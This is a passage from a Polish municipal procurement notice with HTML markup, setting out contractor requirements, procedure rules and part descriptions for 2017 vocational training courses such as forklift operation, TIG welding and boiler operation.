- dysponują co najmniej 2 wózkami jezdniowym o napędzie silnikowym typu: wózki podnośnikowe z wyłączeniem specjalizowanych (kategoria urządzeń II WJO),
-dysponują co najmniej 2 osobami o wykształceniu średnim technicznym posiadającymi ukończone seminarium dla instruktorów-wykładowców szkoleń operatorów wózków jezdniowych oraz co najmniej dwuletnie doświadczenie w prowadzeniu szkoleń z zakresu operatora wózków jezdniowych,  
b)w stosunku do zadania 2: 
dysponuje co najmniej 1 osobą o wykształceniu średnim technicznym posiadającą przygotowanie pedagogiczne, posiadającą kwalifikacje do spawania elektrodą nietopliwą w osłonie gazu obojętnego (TIG) oraz posiadającą co najmniej dwuletnie doświadczenie w prowadzeniu szkoleń spawania elektrodą nietopliwą w osłonie gazu obojętnego (TIG),
c)w stosunku do zadania 3:
dysponuje co najmniej 2 osobami o wykształceniu średnim technicznym posiadającą przygotowanie pedagogiczne, posiadającą kwalifikacje do obsługi pieców CO oraz co najmniej dwuletnie doświadczenie w prowadzeniu szkoleń z zakresu palacz kotłów CO (obsługa kotłów wodnych)  centralnego ogrzewania na paliwa stałe, ciekłe i gazowe  o mocy cieplnej przekraczającej 50 kw.
d)w stosunku do zadania 4:
- dysponuje co najmniej 1 osobą o wykształceniu wyższym posiadającą przygotowanie pedagogiczne oraz co najmniej dwuletnie doświadczenie w prowadzeniu zajęć szkoleniowych w specjalności opiekuna osób starszych i dzieci,
e)w stosunku do zadania 5:
-dysponuje co najmniej 1 osobą o wykształceniu średnim technicznym posiadającą przygotowanie pedagogiczne oraz co najmniej dwuletnie doświadczenie w prowadzeniu zajęć szkoleniowych w zakresie obsługi kasy fiskalnej,
- posiada co najmniej 4 kasy fiskalnych.
f)w stosunku do zadania 6:
- dysponuje co najmniej 1 osobą posiadającą przygotowanie pedagogiczne oraz co najmniej dwuletnie doświadczenie w prowadzeniu zajęć szkoleniowych z zakresu w specjalności  stylista paznokci,
g)w stosunku do zadania 7:
dysponuje co najmniej 1 osobą posiadającą przygotowanie pedagogiczne oraz co najmniej dwuletnie doświadczenie w prowadzeniu zajęć szkoleniowych z zakresu              w specjalności wizażysta / stylista,
h)w stosunku do zadania 8:
dysponuje co najmniej 1 osobą posiadającą przygotowanie pedagogiczne oraz co najmniej dwuletnie doświadczenie w prowadzeniu zajęć szkoleniowych z zakresu obsługi klienta i techniki sprzedaży.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji                         o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy,</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, sporządzony zgodnie z załącznikiem 3 do SIWZ,<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />Zamawiający nie ujawnia informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca nie później niż w terminie składania ofert zastrzegł, że nie mogą one być udostępnione oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 Pzp, tj.: nazwy i adresu informacji dotyczących ceny. Nie wykazanie przez Wykonawcę, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa spowoduje odtajnienie zastrzeżonych informacji.można zastrzec: nazwy i adresu Wykonawcy, informacji dotyczących ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności.
Informacje stanowiące tajemnicę przedsiębiorstwa Wykonawcy, powinny zostać przekazane w taki sposób, by Zamawiający mógł z łatwością określić zakres informacji objętych tajemnicą. Brak stosownego zastrzeżenia będzie traktowany jako jednoznaczny ze zgodą na włączenie całości przekazanych dokumentów i danych do dokumentacji postępowania oraz ich ujawnienie na zasadach określonych w ustawie
<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />Jeżeli Wykonawca zamierza zamieścić w ofercie informacje będące tajemnicą przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 roku o zwalczaniu nieuczciwej konkurencji (jednolity tekst Dz. U. z 2003 roku Nr 153 poz. 1503 z późn. zm.) nie później niż w terminie składania ofert, musi zamieścić adnotację Tajemnica przedsiębiorstwa ze wskazaniem konkretnego punktu, którego dotyczy. Dodatkowo w spisie treści należy podać numery stron zawierające informacje objęte tajemnicą przedsiębiorstwa. Tajemnica przedsiębiorstwa nie obejmuje informacji powszechnie znanych lub tych, których treść każdy zainteresowany może legalnie poznać. W szczególności nie można zastrzec: nazwy i adresu Wykonawcy, informacji dotyczących ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności.
Informacje stanowiące tajemnicę przedsiębiorstwa Wykonawcy, powinny zostać przekazane w taki sposób, by Zamawiający mógł z łatwością określić zakres informacji objętych tajemnicą. Brak stosownego zastrzeżenia będzie traktowany jako jednoznaczny ze zgodą na włączenie całości przekazanych dokumentów i danych do dokumentacji postępowania oraz ich ujawnienie na zasadach określonych w ustawie.
<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/01/2017, godzina: 9:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b><br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przeprowadzenie szkolenia w specjalności operator wózka jezdniowego o napędzie silnikowym dla typu: wózki podnośnikowe z wyłączeniem specjalizowanych (kategoria urządzeń II WJO)  z wymianą butli LPG<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie szkolenia w specjalności operator wózka jezdniowego o napędzie silnikowym dla typu: wózki podnośnikowe z wyłączeniem specjalizowanych (kategoria urządzeń II WJO)  z wymianą butli LPG. 
Liczba uczestników: 16 osób. 
 Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie zajęć teoretycznych oraz praktycznych w wymiarze niezbędnym do przystąpienia do egzaminu przed Urzędem Dozoru Technicznego (w wymiarze nie niższym niż 60 godzin lekcyjnych) celem uzyskania uprawnień dla typu: wózki podnośnikowe z wyłączeniem specjalizowanych (kategoria urządzeń II WJO) z wymianą butli LPG, ważnych u każdego pracodawcy (zaświadczenie kwalifikacyjne UDT).
2)Szkolenie winno zostać przeprowadzone w 2 grupach szkoleniowych, przy czym liczebność grupy nie może przekraczać 10 osób.
3)Przeprowadzenie szkolenia w oparciu o program szkolenia zatwierdzony lub opracowany przez Urząd Dozoru Technicznego.
4)Zorganizowanie egzaminu przeprowadzonego przez Urząd Dozoru Technicznego potwierdzającego nabycie uprawnień dla typu: wózki podnośnikowe z wyłączeniem specjalizowanych (kategoria urządzeń II WJO) z wymianą butli LPG. 
5)Zajęcia teoretyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
6)Zajęcia praktyczne z zakresu obsługi i manewrowania wózkiem widłowym winny odbywać się na terenie Gminy i Miasta Czerwionka-Leszczyny albo w sąsiedniej gminie albo mieście. 
7)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
8)Termin rozpoczęcia szkolenia ustala się na dzień 20 lutego 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 6 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 06/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Przeprowadzenie szkolenia spawanie elektrodą nietopliwą w osłonie gazu obojętnego (TIG)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie szkolenia spawanie elektrodą nietopliwą w osłonie gazu obojętnego (TIG)
Liczba uczestników: 7 osób. 
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie zajęć w wymiarze nie mniejszym niż 110 godzin lekcyjnych;
2)Zorganizowanie egzaminu państwowego przeprowadzonego przed komisją egzaminacyjną;
3)Zajęcia teoretyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
4)Zajęcia praktyczne winny odbywać się na terenie Gminy i Miasta Czerwionka -Leszczyny albo w sąsiedniej gminie albo mieście.
9)Termin rozpoczęcia szkolenia ustala się na dzień 7 marca 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 21 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach.  
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 21/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Przeprowadzenia szkolenia palacza - obsługa kotłów wodnych centralnego ogrzewania na paliwa stałe, ciekłe i gazowe o mocy przekraczającej 50kw (z uprawnieniami)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenia szkolenia palacza - obsługa kotłów wodnych centralnego ogrzewania na paliwa stałe, ciekłe i gazowe o mocy przekraczającej 50kw (z uprawnieniami).
Liczba uczestników: 24 osoby.
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie zajęć w wymiarze niezbędnym do przystąpienia do egzaminu przed komisją egzaminacyjną (nie mniejszym niż 45 godzin lekcyjnych).
2)Szkolenie winno zostać przeprowadzone w 2 grupach szkoleniowych, przy czym liczebność grupy nie może przekraczać 12 osób,
3)Przeprowadzenie szkolenia w oparciu o program szkolenia niezbędny do zdania egzaminu i nabycia kompetencji.
4)Zorganizowanie egzaminu państwowego przeprowadzonego przed komisją egzaminacyjną.
5)Zajęcia teoretyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
6)W razie konieczności przeprowadzenia zajęć praktycznych - zajęcia te winny odbywać się na terenie Gminy i Miasta Czerwionka-Leszczyny albo w sąsiedniej gminie albo mieście.
7)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
8)Termin zakończenia szkolenia i egzaminów ustala się na dzień 18 lutego 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 18/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Przeprowadzenie szkolenia o specjalności opiekun/opiekunka osób starszych oraz opiekun/opiekunka dzieci<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie szkolenia o specjalności opiekun/opiekunka osób starszych oraz opiekun/opiekunka dzieci.
Liczba uczestników: 6 osób. 

Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Celem szkolenia jest przygotowanie słuchaczy do podjęcia pracy lub rozpoczęcia i prowadzenia działalności polegającej na świadczeniu usług w zakresie opieki nad osobami starszymi oraz dziećmi.
2)Przeprowadzenie zajęć w wymiarze nie mniejszym niż 100 godzin lekcyjnych).
3)Program szkolenia winien zawierać dwa bloki tematyczne:
-Opieka nad osobami starszymi obejmujący: podstawy psychologii, edukacja zdrowotna, zmiany zachodzące w organizmie człowieka pod wpływem starzenia się, podstawy gerontologii, etyka zawodowa, metody terapii i aktywizacji, rola i zadania opiekuna osób starszych, bezpieczeństwo i higiena pracy, 
-Opieka nad dziećmi obejmująca: zajęcia dotyczące psychologii dziecięcej, profesjonalnej opieki, zabaw edukacyjnych. Powinny również obejmować biomedyczne podstawy rozwoju człowieka, higienę małego dziecka, żywienie  w różnych fazach rozwoju dziecka, metodykę pracy z dziećmi w tym kreatywne zabawy, organizacja zabaw dla dzieci w kreatywny i rozwijający sposób, ciekawe pomysły na mądre spędzenie czasu z dzieckiem.  
4)Szkolenia winny obejmować zajęcia praktyczne w zakresie:
pomoc w utrzymaniu higieny osobistej osoby starszej.  
-zmianę bielizny osobistej, pościelowej, przesłanie łóżka.
-pomoc przy załatwianiu potrzeb fizjologicznych  podanie basenu, pomoc   w dojściu do toalety.
-zapobieganie powstawaniu odleżyn i odparzeń.
-zmianę pozycji obłożenie chorego w łóżku. 
-opiekę zalecaną przez lekarza - podawanie leków, okłady, nacieranie, karmienie chorego. 
-zapoznanie się instytucjami powołanymi do opieki nad osobami starszymi                                                      i niepełnosprawnymi.
5)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
6)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
7)Termin rozpoczęcia szkolenia ustala się na dzień 7 marca 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 20 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Przeprowadzenie szkolenia z obsługi kasy fiskalnej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie szkolenia z obsługi kasy fiskalnej.
Liczba uczestników: 13 osób.

Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie szkolenia w wymiarze nie mniejszym niż 15 godzin lekcyjnych w oparciu o program szkolenia niezbędny do nabycia kompetencji.
2)Szkolenie winno zostać przeprowadzone w 2 grupach szkoleniowych, przy czym liczebność grupy nie może przekraczać 8 osób,
3)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
4)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
5)Termin rozpoczęcia szkolenia ustala się na dzień 29 marca 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 30 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
